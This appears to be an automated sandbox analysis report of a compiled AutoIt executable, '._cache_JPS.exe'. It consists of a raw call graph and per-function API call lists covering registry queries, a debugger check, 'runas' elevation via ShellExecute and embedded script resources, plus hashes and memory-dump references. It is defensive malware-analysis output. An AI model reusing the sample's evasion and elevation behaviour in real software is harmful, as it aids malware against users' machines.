107171->107187 107188 af0bfa 129 API calls 107171->107188 107189 af1f19 132 API calls 107171->107189 107199 aa1620 59 API calls Mailbox 107171->107199 107200 aeee52 82 API calls 2 library calls 107171->107200 107201 aeef9d 90 API calls Mailbox 107171->107201 107202 adb020 48 API calls 107171->107202 107203 aee713 413 API calls Mailbox 107171->107203 107172->107171 107173->107171 107174->107171 107175->107171 107176->107171 107177->107171 107178->107171 107179->107171 107180->107171 107181->107171 107182->107171 107183->107171 107184->107171 107185->107171 107186->107171 107187->107171 107188->107171 107189->107171 107191 aae022 107190->107191 107192 aae034 107190->107192 107193 a9d89e 50 API calls 107191->107193 107194 aae03a 107192->107194 107195 aae063 107192->107195 107198 aae02c 107193->107198 107197 ab010a 48 API calls 107194->107197 107196 a9d89e 50 API calls 107195->107196 107196->107198 107197->107198 107198->107127 107199->107171 107200->107171 107201->107171 107202->107171 107203->107171 107204->107133 107205->107136 107206->107170 107207->107164 107208->107134 107209->107148 107210->107139 107211->107146 107212->107157 107213 b0bc25 107214 b0bc27 107213->107214 107217 ad79f8 SHGetFolderPathW 107214->107217 107216 b0bc30 107216->107216 107218 a97e53 48 API calls 107217->107218 107219 ad7a25 107218->107219 107219->107216 107220 b0c146 GetUserNameW 107221 b01eca 107226 aabe17 107221->107226 107225 b01ed9 107227 a9d3d2 48 API calls 107226->107227 107228 aabe85 107227->107228 107234 aac929 107228->107234 107230 aabf22 107232 aabf3e 107230->107232 107237 aac8b7 48 API calls _memmove 107230->107237 107233 ab1b2a 52 API calls __cinit 107232->107233 107233->107225 107238 aac955 107234->107238 107237->107230 107239 aac948 107238->107239 107240 aac962 107238->107240 107239->107230 107240->107239 107241 aac969 RegOpenKeyExW 107240->107241 107241->107239 107242 aac983 RegQueryValueExW 107241->107242 107243 aac9b9 RegCloseKey 107242->107243 107244 aac9a4 107242->107244 107243->107239 107244->107243 107245 b01e8b 107250 aae44f 107245->107250 107249 b01e9a 107251 ab010a 48 API calls 107250->107251 107252 aae457 107251->107252 107254 aae46b 107252->107254 107258 aae74b 107252->107258 107257 ab1b2a 52 API calls __cinit 107254->107257 107257->107249 107259 aae463 107258->107259 107260 aae754 107258->107260 107262 aae47b 107259->107262 107290 ab1b2a 52 API calls __cinit 107260->107290 107263 a9d3d2 48 API calls 107262->107263 107264 aae492 GetVersionExW 107263->107264 107265 a97e53 48 API calls 107264->107265 107266 aae4d5 107265->107266 107291 aae5f8 107266->107291 107269 aae617 48 API calls 107270 aae4e9 107269->107270 107272 b029f9 107270->107272 107295 aae6d1 107270->107295 107274 aae55f GetCurrentProcess 107304 aae70e LoadLibraryA GetProcAddress 107274->107304 107275 aae576 107276 aae59e 107275->107276 107277 aae5ec GetSystemInfo 107275->107277 107298 aae694 107276->107298 107279 aae5c9 107277->107279 107282 aae5dc 107279->107282 107283 aae5d7 FreeLibrary 107279->107283 107282->107254 107283->107282 107284 aae5e4 GetSystemInfo 107286 aae5be 107284->107286 107285 aae5b4 107301 aae437 107285->107301 107286->107279 107289 aae5c4 FreeLibrary 107286->107289 107289->107279 107290->107259 107292 aae601 107291->107292 107293 a9a2fb 48 API calls 107292->107293 107294 aae4dd 107293->107294 107294->107269 107305 aae6e3 107295->107305 107309 aae6a6 107298->107309 107302 aae694 2 API calls 107301->107302 107303 aae43f GetNativeSystemInfo 107302->107303 107303->107286 107304->107275 107306 aae55b 107305->107306 107307 aae6ec LoadLibraryA 107305->107307 107306->107274 107306->107275 107307->107306 107308 aae6fd GetProcAddress 107307->107308 107308->107306 107310 aae5ac 107309->107310 107311 aae6af LoadLibraryA 107309->107311 107310->107284 107310->107285 107311->107310 107312 aae6c0 GetProcAddress 107311->107312 107312->107310 107313 b01eed 107318 aae975 107313->107318 107315 b01f01 107334 ab1b2a 52 API calls __cinit 107315->107334 107317 b01f0b 107319 ab010a 48 API calls 107318->107319 107320 aaea27 GetModuleFileNameW 107319->107320 107321 ab297d __wsplitpath 47 API calls 107320->107321 107322 aaea5b _wcsncat 107321->107322 107335 ab2bff 107322->107335 107325 ab010a 48 API calls 107326 aaea94 _wcscpy 107325->107326 107327 a9d3d2 48 API calls 107326->107327 107328 aaeacf 107327->107328 107338 aaeb05 107328->107338 107330 aaeae0 Mailbox 107330->107315 107331 aaeada _wcscat __wsetenvp _wcsncpy 107331->107330 107332 a9a4f6 48 API calls 107331->107332 107333 ab010a 48 API calls 107331->107333 107332->107331 107333->107331 107334->107317 107352 abaab9 107335->107352 107339 a9c4cd 48 API calls 107338->107339 107340 aaeb14 RegOpenKeyExW 107339->107340 107341 b04b17 RegQueryValueExW 107340->107341 107342 aaeb35 107340->107342 107343 b04b30 107341->107343 107344 b04b91 RegCloseKey 107341->107344 107342->107331 107345 ab010a 48 API calls 107343->107345 107346 b04b49 107345->107346 107347 a94bce 48 API calls 107346->107347 107348 b04b53 RegQueryValueExW 107347->107348 107349 b04b86 107348->107349 107350 b04b6f 107348->107350 107349->107344 107351 a97e53 48 API calls 107350->107351 107351->107349 107353 abaaca 107352->107353 107354 ababc6 107352->107354 107353->107354 107357 abaad5 107353->107357 107362 ab889e 47 API calls __getptd_noexit 107354->107362 107358 aaea8a 107357->107358 107361 ab889e 47 API calls __getptd_noexit 107357->107361 107358->107325 107360 ababbb 107363 ab7aa0 8 API calls __strnicmp_l 107360->107363 107361->107360 107362->107360 107363->107358 107364 aa0ff7 107365 aae016 50 API calls 107364->107365 107366 aa100d 107365->107366 107421 aae08f 107366->107421 107370 a9fbf1 Mailbox 107372 aa105e 107380 a9c935 48 API calls 107372->107380 107373 aa0dee 107377 a9d89e 50 API calls 107373->107377 107374 a9c935 48 API calls 107385 a9fad8 Mailbox _memmove 107374->107385 107376 aa1063 107441 add520 86 API calls 4 library calls 107376->107441 107386 aa0dfa 107377->107386 107378 b0b772 107443 add520 86 API calls 4 library calls 107378->107443 107379 aa0119 107442 add520 86 API calls 4 library calls 107379->107442 107380->107370 107381 a9f6d0 413 API calls 107381->107385 107382 a9d89e 50 API calls 107389 aa0e83 107382->107389 107383 aca599 InterlockedDecrement 107383->107385 107384 a9d3d2 48 API calls 107384->107385 107385->107370 107385->107372 107385->107373 107385->107374 107385->107376 107385->107378 107385->107379 107385->107381 107385->107383 107385->107384 107385->107386 107385->107389 107392 ab1b2a 52 API calls __cinit 107385->107392 107395 aa103d 107385->107395 107396 ab010a 48 API calls 107385->107396 107397 a9fa40 413 API calls 107385->107397 107400 b0b583 107385->107400 107402 aa10f1 Mailbox 107385->107402 107403 af804e 113 API calls 107385->107403 107404 af798d 109 API calls 107385->107404 107405 af30ad 93 API calls 107385->107405 107406 aeb74b 413 API calls 107385->107406 107407 af17aa 87 API calls 107385->107407 107408 aaef0d 94 API calls 107385->107408 107409 a950a3 49 API calls 107385->107409 107410 af10e5 82 API calls 107385->107410 107411 aaf461 98 API calls 107385->107411 107412 ae8065 55 API calls 107385->107412 107413 ae9122 91 API calls 107385->107413 107414 ae92c0 88 API calls 107385->107414 107415 aadd84 3 API calls 107385->107415 107416 a981c6 85 API calls 107385->107416 107417 ae013f 87 API calls 107385->107417 107418 aaf03e 2 API calls 107385->107418 107419 af0bfa 129 API calls 107385->107419 107420 af1f19 132 API calls 107385->107420 107433 aa1620 59 API calls Mailbox 107385->107433 107434 aeee52 82 API calls 2 library calls 107385->107434 107435 aeef9d 90 API calls Mailbox 107385->107435 107436 adb020 48 API calls 107385->107436 107437 aee713 413 API calls Mailbox 107385->107437 107386->107382 107388 b0b7d2 107390 a9caee 48 API calls 107389->107390 107390->107402 107392->107385 107395->107370 107440 add520 86 API calls 4 library calls 107395->107440 107396->107385 107397->107385 107438 add520 86 API calls 4 library calls 107400->107438 107439 add520 86 API calls 4 library calls 107402->107439 107403->107385 107404->107385 107405->107385 107406->107385 107407->107385 107408->107385 107409->107385 107410->107385 107411->107385 107412->107385 107413->107385 107414->107385 107415->107385 107416->107385 107417->107385 107418->107385 107419->107385 107420->107385 107422 a97b6e 48 API calls 107421->107422 107423 aae0b4 _wcscmp 107422->107423 107424 a9caee 48 API calls 107423->107424 107426 aae0e2 Mailbox 107423->107426 107425 b0b9c7 107424->107425 107444 a97b4b 48 API calls Mailbox 107425->107444 107426->107385 107428 b0b9d5 107429 a9d2d2 53 API calls 107428->107429 107430 b0b9e7 107429->107430 107431 a9d89e 50 API calls 107430->107431 107432 b0b9ec Mailbox 107430->107432 107431->107432 107432->107385 107433->107385 107434->107385 107435->107385 107436->107385 107437->107385 107438->107402 107439->107370 107440->107376 107441->107379 107442->107378 107443->107388 107444->107428

                                                                                                                                                        Executed Functions

                                                                                                                                                        Function 00A9374E Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 145windowCOMMON
                                                                                                                                                        Download Yara Rule

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        APIs
                                                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,00000001), ref: 00A9376D
                                                                                                                                                          • Part of subcall function 00A94257: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\._cache_JPS.exe,00000104,?,00000000,00000001,00000000), ref: 00A9428C
                                                                                                                                                        • IsDebuggerPresent.KERNEL32(?,?), ref: 00A9377F
                                                                                                                                                        • GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\._cache_JPS.exe,00000104,?,00B51120,C:\Users\user\Desktop\._cache_JPS.exe,00B51124,?,?), ref: 00A937EE
                                                                                                                                                          • Part of subcall function 00A934F3: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00A9352A
                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00A93860
                                                                                                                                                        • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00B42934,00000010), ref: 00B021C5
                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?,?), ref: 00B021FD
                                                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?), ref: 00B02232
                                                                                                                                                        • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00B2DAA4), ref: 00B02290
                                                                                                                                                        • ShellExecuteW.SHELL32(00000000), ref: 00B02297
                                                                                                                                                          • Part of subcall function 00A930A5: GetSysColorBrush.USER32(0000000F), ref: 00A930B0
                                                                                                                                                          • Part of subcall function 00A930A5: LoadCursorW.USER32(00000000,00007F00), ref: 00A930BF
                                                                                                                                                          • Part of subcall function 00A930A5: LoadIconW.USER32(00000063), ref: 00A930D5
                                                                                                                                                          • Part of subcall function 00A930A5: LoadIconW.USER32(000000A4), ref: 00A930E7
                                                                                                                                                          • Part of subcall function 00A930A5: LoadIconW.USER32(000000A2), ref: 00A930F9
                                                                                                                                                          • Part of subcall function 00A930A5: RegisterClassExW.USER32(?), ref: 00A93167
                                                                                                                                                          • Part of subcall function 00A92E9D: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000), ref: 00A92ECB
                                                                                                                                                          • Part of subcall function 00A92E9D: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00A92EEC
                                                                                                                                                          • Part of subcall function 00A92E9D: ShowWindow.USER32(00000000), ref: 00A92F00
                                                                                                                                                          • Part of subcall function 00A92E9D: ShowWindow.USER32(00000000), ref: 00A92F09
                                                                                                                                                          • Part of subcall function 00A93598: _memset.LIBCMT ref: 00A935BE
                                                                                                                                                          • Part of subcall function 00A93598: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00A93667
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Window$IconLoadName$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                                                                                                                                                        • String ID: C:\Users\user\Desktop\._cache_JPS.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                                                                                                                                                        • API String ID: 4253510256-789825793
                                                                                                                                                        • Opcode ID: 1ef1c972a3fa488873e00c602a454ac9a08bb8853a8de4f9be3c8110620894fa
                                                                                                                                                        • Instruction ID: a566485c35d7429f6abf8195b819dc02a4376ab642982591066834501f19de18
                                                                                                                                                        • Opcode Fuzzy Hash: 1ef1c972a3fa488873e00c602a454ac9a08bb8853a8de4f9be3c8110620894fa
                                                                                                                                                        • Instruction Fuzzy Hash: 69512676744244BACF10ABA4EC46FED3BF89B09711F0084E6FB51A31E1CE704A49CB62
                                                                                                                                                        Function 00AF30AD Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                                                                                                                                        Download Yara Rule

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 1168 af30ad-af315b call a9ca8e call a9d3d2 * 3 call a984a6 call af3d7b call af3af7 1183 af315d-af3161 1168->1183 1184 af3166-af3170 1168->1184 1185 af31e6-af31f2 call add7e4 1183->1185 1186 af31a2 1184->1186 1187 af3172-af3187 RegConnectRegistryW 1184->1187 1196 af3504-af3527 call a95cd3 * 3 1185->1196 1191 af31a6-af31c3 RegOpenKeyExW 1186->1191 1189 af319c-af31a0 1187->1189 1190 af3189-af319a call a97ba9 1187->1190 1189->1191 1190->1185 1194 af31f7-af3227 call a984a6 RegQueryValueExW 1191->1194 1195 af31c5-af31d7 call a97ba9 1191->1195 1203 af323e-af3254 call a97ba9 1194->1203 1204 af3229-af3239 call a97ba9 1194->1204 1206 af31d9-af31dd RegCloseKey 1195->1206 1207 af31e3-af31e4 1195->1207 1215 af34dc-af34dd 1203->1215 1216 af325a-af325f 1203->1216 1214 af34df-af34e6 call add7e4 1204->1214 1206->1207 1207->1185 1223 af34eb-af34fc RegCloseKey 1214->1223 1215->1214 1219 af344c-af3498 call ab010a call a984a6 RegQueryValueExW 1216->1219 1220 af3265-af3268 1216->1220 1244 af349a-af34a6 1219->1244 1245 af34b4-af34ce call a97ba9 call add7e4 1219->1245 1224 af326e-af3273 1220->1224 1225 af33d9-af3411 call adad14 call a984a6 RegQueryValueExW 1220->1225 1223->1196 1227 af34fe-af3502 RegCloseKey 1223->1227 1229 af338d-af33d4 call a984a6 RegQueryValueExW call aa2570 1224->1229 1230 af3279-af327c 1224->1230 1225->1223 1251 af3417-af3447 call a97ba9 call add7e4 call aa2570 1225->1251 1227->1196 1229->1223 1234 af32de-af332b call ab010a call a984a6 RegQueryValueExW 1230->1234 1235 af327e-af3281 1230->1235 1234->1245 1260 af3331-af3348 1234->1260 1235->1215 1236 af3287-af32d9 call a984a6 RegQueryValueExW call aa2570 1235->1236 1236->1223 1250 af34aa-af34b2 call a9ca8e 1244->1250 1264 af34d3-af34da call ab017e 1245->1264 1250->1264 1251->1223 1260->1250 1265 af334e-af3355 1260->1265 1264->1223 1268 af335c-af3361 1265->1268 1269 af3357-af3358 1265->1269 1272 af3376-af337b 1268->1272 1273 af3363-af3367 1268->1273 1269->1268 1272->1250 1274 af3381-af3388 1272->1274 1276 af3369-af336d 1273->1276 1277 af3371-af3374 1273->1277 1274->1250 1276->1277 1277->1272 1277->1273
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00AF3AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00AF2AA6,?,?), ref: 00AF3B0E
                                                                                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00AF317F
                                                                                                                                                          • Part of subcall function 00A984A6: __swprintf.LIBCMT ref: 00A984E5
                                                                                                                                                          • Part of subcall function 00A984A6: __itow.LIBCMT ref: 00A98519
                                                                                                                                                        • RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,?), ref: 00AF321E
                                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00AF32B6
                                                                                                                                                        • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00AF34F5
                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00AF3502
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1240663315-0
                                                                                                                                                        • Opcode ID: 570a0bbcb9aa9079644533ae7fbaa274d9d6b309b33c24e3980eab0307fd0bca
                                                                                                                                                        • Instruction ID: 299079c357680e1b21383c3011c7000e0ade67cf8e5f25a2072b0b6b3061223c
                                                                                                                                                        • Opcode Fuzzy Hash: 570a0bbcb9aa9079644533ae7fbaa274d9d6b309b33c24e3980eab0307fd0bca
                                                                                                                                                        • Instruction Fuzzy Hash: 3DE17B35204204AFCB15DF68C995E2ABBF8EF89314F04896DF54ADB261DB30EE41CB52
                                                                                                                                                        Function 00A929C2 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151timewindowregistryCOMMON
                                                                                                                                                        Download Yara Rule

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 1278 a929c2-a929e2 1280 a92a42-a92a44 1278->1280 1281 a929e4-a929e7 1278->1281 1280->1281 1284 a92a46 1280->1284 1282 a929e9-a929f0 1281->1282 1283 a92a48 1281->1283 1285 a92aac-a92ab4 PostQuitMessage 1282->1285 1286 a929f6-a929fb 1282->1286 1288 b02307-b02335 call a9322e call aaec33 1283->1288 1289 a92a4e-a92a51 1283->1289 1287 a92a2b-a92a33 NtdllDefWindowProc_W 1284->1287 1293 a92a72-a92a74 1285->1293 1291 a92a01-a92a03 1286->1291 1292 b0238f-b023a3 call ad57fb 1286->1292 1294 a92a39-a92a3f 1287->1294 1323 b0233a-b02341 1288->1323 1295 a92a53-a92a54 1289->1295 1296 a92a76-a92a9d SetTimer RegisterClipboardFormatW 1289->1296 1298 a92a09-a92a0e 1291->1298 1299 a92ab6-a92ac0 call a91e58 1291->1299 1292->1293 1316 b023a9 1292->1316 1293->1294 1302 a92a5a-a92a6d KillTimer call a92b94 call a92ac7 1295->1302 1303 b022aa-b022ad 1295->1303 1296->1293 1300 a92a9f-a92aaa CreatePopupMenu 1296->1300 1305 b02374-b0237b 1298->1305 1306 a92a14-a92a19 1298->1306 1317 a92ac5 1299->1317 1300->1293 1302->1293 1309 b022e3-b02302 MoveWindow 1303->1309 1310 b022af-b022b1 1303->1310 1305->1287 1312 b02381-b0238a call acb31f 1305->1312 1314 a92a1f-a92a25 1306->1314 1315 b0235f-b0236f call ad5fdb 1306->1315 1309->1293 1318 b022d2-b022de SetFocus 1310->1318 1319 b022b3-b022b6 1310->1319 1312->1287 1314->1287 1314->1323 1315->1293 1316->1287 1317->1293 1318->1293 1319->1314 1324 b022bc-b022cd call a9322e 1319->1324 1323->1287 1327 b02347-b0235a call a92b94 call a93598 1323->1327 1324->1293 1327->1287
                                                                                                                                                        APIs
                                                                                                                                                        • NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 00A92A33
                                                                                                                                                        • KillTimer.USER32(?,00000001), ref: 00A92A5D
                                                                                                                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00A92A80
                                                                                                                                                        • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00A92A8B
                                                                                                                                                        • CreatePopupMenu.USER32 ref: 00A92A9F
                                                                                                                                                        • PostQuitMessage.USER32(00000000), ref: 00A92AAE
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Timer$ClipboardCreateFormatKillMenuMessageNtdllPopupPostProc_QuitRegisterWindow
                                                                                                                                                        • String ID: TaskbarCreated
                                                                                                                                                        • API String ID: 157504867-2362178303
                                                                                                                                                        • Opcode ID: 447093e1183d9440284abbc1fb9dd60ef0ccc69e7652b71524efeee42a0ca9ce
                                                                                                                                                        • Instruction ID: 97c1d5fa8d94d8e8cc1188287e86081fcae9c023495aa2ceca9a17869970faa0
                                                                                                                                                        • Opcode Fuzzy Hash: 447093e1183d9440284abbc1fb9dd60ef0ccc69e7652b71524efeee42a0ca9ce
                                                                                                                                                        • Instruction Fuzzy Hash: A8415433300245BFDF34AF689D0DBBA36EAE714381F444AA6F902979E1DE749C448765
                                                                                                                                                        Function 00AAE47B Relevance: 10.7, APIs: 7, Instructions: 175COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetVersionExW.KERNEL32(?,00000000), ref: 00AAE4A7
                                                                                                                                                          • Part of subcall function 00A97E53: _memmove.LIBCMT ref: 00A97EB9
                                                                                                                                                        • GetCurrentProcess.KERNEL32(00000000,00B2DC28,?,?), ref: 00AAE567
                                                                                                                                                        • GetNativeSystemInfo.KERNEL32(?,00B2DC28,?,?), ref: 00AAE5BC
                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?), ref: 00AAE5C7
                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?), ref: 00AAE5DA
                                                                                                                                                        • GetSystemInfo.KERNEL32(?,00B2DC28,?,?), ref: 00AAE5E4
                                                                                                                                                        • GetSystemInfo.KERNEL32(?,00B2DC28,?,?), ref: 00AAE5F0
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion_memmove
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2717633055-0
                                                                                                                                                        • Opcode ID: 68373acb71f17554ae0d976865837228b48792f544ef9b3cc1bff73d350b4e64
                                                                                                                                                        • Instruction ID: adb424494a03da26303f0271da61e9b37ae1aa66c16bab8215b091fe70149af0
                                                                                                                                                        • Opcode Fuzzy Hash: 68373acb71f17554ae0d976865837228b48792f544ef9b3cc1bff73d350b4e64
                                                                                                                                                        • Instruction Fuzzy Hash: F861C0B1809284DFCF16CF68A8C51E97FB5AF2A304F2945D9D8449B287D734C908CF65
                                                                                                                                                        Function 00A931F2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00A93202
                                                                                                                                                        • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000), ref: 00A93219
                                                                                                                                                        • LoadResource.KERNEL32(?,00000000), ref: 00B057D7
                                                                                                                                                        • SizeofResource.KERNEL32(?,00000000), ref: 00B057EC
                                                                                                                                                        • LockResource.KERNEL32(?), ref: 00B057FF
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
